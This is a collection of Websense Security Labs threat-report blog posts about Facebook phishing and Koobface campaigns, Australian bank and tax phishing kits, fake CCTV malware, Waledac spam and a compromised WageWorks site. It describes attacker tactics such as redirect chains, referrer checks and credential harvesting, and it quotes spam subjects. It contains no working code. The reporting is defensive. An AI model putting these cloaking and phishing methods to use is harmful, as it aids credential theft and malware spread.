Websense Security Labs™ ThreatSeeker™ Network has detected another fake Facebook sites campaign, just 4 days after Websense warned of the Mark Zuckerberg Facebook Page Showing Rogue Comments hack. A malicious executable file appears on fake Facebook sites titled  "Facebook Profile Photos". Websense customers have been protected against this attack with ACE, our Advanced Classification Engine.

The attack posts messages on the wall of compromised Facebook accounts, and uses a previously-created counterfeit Facebook application to lure users' visits.

The payload of the application site redirects to another malicious link:

The malicious link then redirects users to a fake Facebook sign-in page to steal usernames and passwords:

The compromised Facebook accounts are starting to send messages to their friends' accounts with fake applications sites and other malicious links such as  "Facebook Profile Photos" sites, further spreading the campaign.

The "Facebook Profile Photos" site is shown below:

A piece of malicious code in the payload:

When a user clicks on the fake link, a dialog appears prompting them to download a file. At the time of writing this file had a low 2/42 malware detection as analyzed by Virus Total, and is now only detected by almost half of the AV engines.

To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from: http://defensio.com/.

This morning Mark Zuckerberg's Facebook fan page is still down after having an apparent rogue comment posted to the page yesterday.  The short post was seemingly from Mark Zuckerberg but was an unusual message with a political theme. This is the second similar hack this week.  The French President Nicolas Sarkozy also offered a political message to his Facebook fans this week - apparently not from him though.

A screenshot of the rogue post to Zuckerberg's page is below:

The URL shortener in the message links to a non-malicious page on Wikipedia.

The current message delivered to users wishing to access the Mark Zuckerberg page is:

Although the reason for the rogue comment is unclear (a short message post seemingly political in nature), the event certainly highlights the need for increased security with usernames and passwords.  This is becoming even more important as many sites are now permitting sign-in using accounts set up in other social networks and services.  For example, Bebo and Yahoo! as below:

To protect yourself from malicious URL links and spam posts being made to your Facebook wall, try our free Defensio Facebook app.  You can download it from: http://defensio.com/.

Websense Security Labs™ ThreatSeeker™ Network has detected a new phishing kit circulating in the Oceania region. Following on from the UK tax assessment attack, more phishing attacks are surfacing and this campaign targets seven top Australian banks at once along with the Australian Tax Office. Websense customers have been protected against this attack with ACE.

The attack first imitates the Australian Tax Office (ATO) e-tax refund page, an online system where taxpayers can lodge their annual tax refund requests. The kit readies 7 of the biggest banks of Australia, covering almost all accounts. This kit was hosted on compromised Web sites with deep directories specifically mimicking the ATO Web site. Each bank phishing Web site was then placed as follows:

Screenshot of spoofed ATO site hosting 7 phishing sites:

Screenshot of the 7 targeted banks:

Similar to earlier phishing toolkits, this attack utilizes PHP scripts to retrieve, parse, and send on the compromised account information. The kit was also held on several other compromised Web sites to enable the failover of the attack - given the limited lifecycle of phishing sites, more users fall victim to them in the first 24 hours of the attack. The readiness of this phishing toolkit exceeds Rock Phish, a kit that we have monitored in previous years: whereas Rock Phish had a tendency toward volume attack, this is well-crafted and links several financial institutions in one place.

As the UK self assessment tax return deadline for online completion draws near, and the US tax season begins, we at Websense Security Labs again see an increase in related spam.

The most recent attacks are mainly "form-based."  Our Threatseeker network finds these coming in several varieties, but the main one is a request for the recipient to complete an attached HTML form or zipped file containing an HTML form. Given that it is tax season, this phishing attack often takes the form of welcome news: it purports to be an email notification from the tax office indicating a refund. As usual, spammers are keeping abreast with the important events of the season, and know that January is when the public usually submits returns and starts getting refunds. The form-based approach is a slight variation--the spammers don’t seem to be restricting themselves to the usual direct links to phishing sites to lure unsuspecting recipients to divulge personal details.

Websense customers are proactively protected against this attack via both email and Web channels by our Advanced Classification Engine - ACE. 

What are form-based email attacks?

Form-based attacks are a type of phishing.  Instead of using a link to take the recipient to a phishing site, they include a form that the user is asked to complete.  When the user completes and submits the form, the details are sent to the attacker.  The short video below shows an example of a form-based attack.

As shown below, several of the attacks are very convincing. We can see how a user might fall prey to such a scam.  The first of the samples is aimed at users in the United Kingdom, and includes a picture of Moira Stuart, who plays the narrator in the HMRC television advert.  The second sample is aimed at users in the United States users, as the content suggests (IRS). 

Other form-based samples that we see in the wild include campaigns that target:

- LlloydsTSB Bank

- HSBC Bank

- Santander Bank

- Alliance & Leicester Bank

- Paypal

Websense Security Labs™ has detected hacking activity targeting CCTV (China Central Television). The hackers utilize CCTV's popularity to distribute malware on the Internet. The malware installs rogue software on the user's computer that hijack browser allowing advertisements, affiliation  traffic, and also pushes up websites' reputation via redirection. We also have detected before such low profile search engine site was pushed up to Alexa rank of almost 9000 via adware visits and hosts malicious injections on its site. Websense customers have been protected against this attack with ACE.

First, the hackers create an imitation CCTV site that has a name that is close to CCTV.COM (e.g. CCTVxxx.COM). On the site they provide a download of the CCTV Box software. Actually, it is just a malware hackers want users to download. CCTV Box is very popular Internet TV software developed by CCTV. With Box, users can easily watch CCTV programs on the Internet.

Here is an example imitation site:

The malware download has a detection of 6/43 on VirusTotal:

When users run the file on their computer, it automatically installs two executable files:

C:\Program Files\Internet Explorer\update.exe  -- Visual Basic Application
C:\Program Files\imetool\imetool.exe  - UPX packed

Without the user's knowledge, the executables install a set of tool and desktop shortcuts on the computer.

Users are fooled to use the desktop IE shortcuts to launch the web browser, where the front page was modified to go to low profile search engine site as screenshot below , also the desktop taobao.com shortcuts, the most popular online shopping site in China with hidden referral details.

Taobao site redirect:

Search engine site redirect:

Month of December

Major Hits

December was completely flooded by the "Wikileaks case." Anonymous launched a series of DDoS attacks against "the enemies":  PayPal blog, Post Finance, EveryDNS, Mastercard and many others. Low Orbit Ion Canon (LOIC) showed also showed strong potential. 

Thanks to a vulnerability open to the world for 6 months, 1.5 million usernames, email addresses, and DES-encrypted passwords were released on Pirate Bay. Anonymous was involved again. Can you guess who we are talking about? Gawker Media did not receive good PR this time.

Once again, an undisclosed number of customers' private details such as email addresses, contact information, and birthdates were leaked from the McDonalds database. There were no burger give-aways though.

Browser and friends

Google reacted to the threats exploiting PDF and Flash. Sandbox, a Google technology, is a method of isolating an application from the rest of the operating system while tightly controlling its resources. The Chrome 8.0.552.215 update includes a new built-in PDF viewer that is secured in Chrome's sandbox. PDF files are contained within the sandbox environment. Twelve vulnerabilities were fixed in this version. In mid December, Google extended the sandbox to support Adobe's Flash Player plug-in in its Chrome browser.

Two zero-day vulnerabilities were found in Internet Explorer. One of the vulnerabilities, CVE-2010-3971, allows remote attackers to cause a denial of service and execute arbitrary code via multiple @import calls in a crafted document. Details can be found here.

Mozilla released a security update to patch 11 vulnerabilities, 9 of which are rated "critical" because they can be used to run attacker code.

Apple shipped a new version of QuickTime Player with 15 security holes fixed.

Microsoft

On Black Tuesday December 2010, Microsoft released 17 bulletins intended to patch 40 vulnerabilities across Windows, Office, Internet Explorer, SharePoint Server, and Exchange. Of the bunch, 2 bulletins were rated critical, 14 important, and 1 moderate. 

In total, Microsoft delivered 106 security bulletins in 2010, the highest number in history.

Microsoft was also confronted with 2 zero-day vulnerabilities this month. The first vulnerability (CVE-2010-3971) targets the way Internet Explorer handles Cascaded Style Sheets (CSS). The second vulnerability is found in Microsoft WMI Administrative Tools WBEMSingleView.ocx ActiveX control. Both exploits can be used by remote attackers to take complete control of a vulnerable system.

Hello ThreatSeeker. You've got mail!

Spam levels declined in December compared with November 2010.  There were 2 significant points in December.

First we saw a drastic decrease in the output of spam from bots, particularly Rustock.  This became apparent during Christmas time.

An increase in spam output was seen on January 10. However, spam levels are still not yet back to November levels.

Also significant in December was the New Year-themed spam output from a bot widely speculated as being associated with Waledac/Storm. Spammers were up to their usual social engineering tricks pushing out Happy New Year videos.

Security Trends

Gallup's 2010 crime survey found that computer-related crime is a growing problem for average Americans. Eleven percent of U.S. adults reported tha tduring the past year, they or a household member were victims of a computer or Internet crime on their home computer. This is up from the 6% to 8% level found in the previous 7 years.

A new Android Trojan called Geinimi emerged from China on the end of December 2010 displaying botnet characteristics. The malware compromises a significant amount of information on a user's Android smartphone and sends the information to remote servers. The information it collects includes location coordinates and unique identifiers for the device (IMEI) and SIM card (IMSI).

On the topic of computer security for 2011 you may be interested to read our Threat Report which details the threats that we predict will pick up pace in 2011.  Read it here.

This month's roundup contributors:

• Carl Leonard
• Lei Li
• Ivan Sabo
• Ulysses Wang
• Xue Yang

Websense Security Labs™ ThreatSeeker™ Network has detected a new Koobface campaign spreading on Facebook. The campaign is spreading via direct messages sent from compromised accounts. Websense customers have been protected against this attack with ACE.

Sample message:

Some observations on employed tactics by Koobface

One of the tactics employed by the Koobface gang is to attempt to obfuscate the malicious URL that is linked in each message. In message shown above, this is done by adding "hpPg" just before the valid URL link--an obvious attempt to avoid detection by security software and by the Facebook security team. The addition at the start of the URL makes it unclickable, but this is unlikely to stop determined users from copying and pasting the link directly into the browser. Another tactic is the use of open redirects on the facebook.com domain itself. This gives the URL a more credible look (social engineering), as well as helping it pass basic security checks. Usually, Facebook alerts users if they're about to browse to a link outside of its domains, but no alert is triggered in this case. 

In the message above, the open redirect on facebook.com points to a bit.ly shortened link. The redirector at bit.ly points to a compromised Web site controlled by Koobface. The compromised site checks whether the request was referred from facebook.com. If it was, then it serves a dynamically generated script that further redirects to a malicious site. The malicious site requires "a missing Flash plug-in" in order to play a "video," a.k.a., a variant of the Koobface worm. At the time of writing, the variant had a 23% detection rate.

An example redirection chain:

http://www.facebook.com/[removed]bit.ly/g1[removed]

==>> http://bit.ly/[removed]

==>> [removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263

==>> [removed].net/jxjv0z2s/? 

There are some checks in place to make sure that the request came from Facebook. If the request at the first step of the redirection didn't originate from facebook.com, a fake Google News page is presented rather than further redirecting to the malicious fake video Web site.

[removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263

[UPDATE] - One reader commented that the the redirection to the malicious page can take place if any URL (not just facebook.com variations) is as referrer field in the request header at the second stage request (the request to [removed].com/24uqy7e/?md5=f6d9f0efc395fc0f331028c23f9fa5b9&page=12263). This is correct and has been verified, also it seems that a valid browser user agent must also be set in the request header in order to redirect to the malicious page. If a referrer is not set at all, the response will not present a fake Google News page any more, but a fake Facebook page that requires a login, The page is set up for harvesting credentials, once a victim enters his/hers credentials in, they're redirected to facebook.com and attempted to automatically be logged in. It seems that Facebook detects that an invalid attempt was made to login to their platform and notify the user. Beware that if the correct credentials were entered to the phishing page then Facebook may have stopped a potential attack on the victim's account but the credentials are deemed to be stolen and should be changed immediately. 

Waledac appeared in a new version in the last days of 2010, sending out big amounts of New Year related spam messages. It then stopped spamming in the evening of January 4th.

On Tuesday morning a new variant of Waledac was distributed to members of the botnet. Yesterday it started spamming again, but now it's back to sending pharmaceutical spam promoting "the magic blue pill" which we have seen previous versions of Waledac do in the past. As in previous spam campaigns, the spammers are using redirections via compromised legitimate sites.

When clicked, the link leads to your average Canadian pharmaceutical spam page:

The new spam campaign doesn't redirect to malicious content, just to spam content but that could change at any point if the people behind Waledac decides to grow the botnet.

We have seen hundreds of different subjects being used in this campaign, here are some examples:

Wonderful revealing effect on your libido.
I dream u to be vigorous, dive into u dream this too
The most excellent way to satisfy her
Your gf wants your organ to be the finest worker of the year!
Want to act like a xxxstar? Bang a blu-colored pill!
FDA-approved blue-blu-colored med to heal ED!
She needs YOU to grow your PENI!
Wish to surprise and gratify your lady tonight?

Websense customers of both our email and Web products are protected against this by ACE, our Advanced Classification Engine.

With the end of the Christmas and New Year periods, Websense has seen the first notable spike in the number of spam messages processed by our Hosted Email Security services.  Could this spike indicate an upturn toward pre-November 2010 spam levels, or alternatively could it be just a blip in the spam universe?

Recently we spoke with several news agencies discussing the decline in spam volumes during the Christmas period and December 2010.  You can familiarize yourself with that story by looking at the article here on the BBC.

Today we noticed a spike in activity starting just after midnight on Monday morning UK time.  As long as there is profit in spam, global spam senders are not going to go away any time soon.

This spike is evident in the graph below which charts messages processed per second over the last 3 weeks:

Over the last 6 months the sharp decrease over the Christmas period is even more apparent:

The spike in spam today appears to be attributable to medical spam using Russian domains that we have seen used before.  This spam has a subject like "<email address> VIAGRA Official <random number>%"

Example subjects in malicious emails we are seeing today come from spam senders known to our service and include subjects such as:

    * Your friend invited you to Twitter!
    * You have received A Hallmark E-Card!
    * You have got a new message on Facebook!
    * Shipping update for your Amazon.com order

We will continue to monitor the situation and as usual, Websense customers are protected against the Return Of The Spam using ACE, our Advanced Classification Engine technology.

A website owned by WageWorks has been compromised to redirect users to a known malicious Web site. The site that is compromised is hxxp://learnwageworks.com and we advise users to not visit this site until the issue has been fixed. Websense customers are protected proactively against the compromise by ACE, our Advanced Classification Engine.

Update: WageWorks got in touch with us and promptly fixed the problem.

The injection itself is visible in clear text on the page, but you have to scroll down quite far when viewing the source to see it.

The site it redirects to is currently down, and the main WageWorks site, http://www.wageworks.com, is not compromised. The attack site was active as late as yesterday and hosted the Phoenix Exploit Kit, one of the most popular kits used to install malware on users' PCs. The first time we saw the attack site hosting malicious code was on December 28, 2010:

We have received several reports from customers asking about this. Because WageWorks is one of the largest benefits providers in the US and is used by several large organizations, the compromise could become much more serious if the attack page is activated or changed to another site.

We want to emphasize that Websense customers are proactively protected against this compromise, thanks to the real-time analytics that are part of ACE.

We have notified WageWorks about the compromise but have not received a reply.